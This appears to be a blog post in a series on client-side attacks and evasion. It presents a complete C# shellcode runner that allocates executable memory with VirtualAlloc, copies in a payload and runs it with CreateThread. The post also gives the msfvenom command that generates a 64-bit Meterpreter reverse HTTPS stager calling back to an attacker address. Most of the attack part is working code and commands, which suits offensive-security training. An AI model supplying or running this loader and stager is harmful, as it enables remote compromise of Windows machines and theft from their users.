Weaponising C#

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.



Running Shell Code in C#


Using lessons learnt from the last few weeks from both VBA and PowerShell we look to use VirtualAlloc, CreateThread, and WaitForSingleObject to execute shellcode in memory.


Next, we need to generate our shellcode (See Below). on a 64-bit Windows operating system, Jscript will execute in a 64-bit context by default so we have to generate a 64-bit Meterpreter staged payload in C# format.


Looking at the code in detail starting with the variables, The first is buf. this contains the shellcode. Next is the size variable that stores the size of the buf variable.


We then use the WaitForSingleObject API to let the shellcode finish execution. Otherwise, the Jscript execution would terminate the process before the shell becomes active.


we must set the CPU architecture to x64 since we are using 64-bit shellcode. This is done through the CPU drop down menu, where we open the

Code Example




using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint
            dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        {
            byte[] buf = new byte[687] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00 .... <SNIP>};


            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

            Marshal.Copy(buf, 0, addr, size);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}


The Payload



The payload used in the buff variable is created using msfvenom for the reverse shell stager over https on 443.


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 EXITFUNC=thread -f csharp



Video Example






8 views0 comments

Recent Posts

See All

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Over the last few weeks, we have been building payloads an

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. When looking at exploiting operating systems and conducting client-side attacks it

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. As discussed last week, office products are some of the most widely utilised produc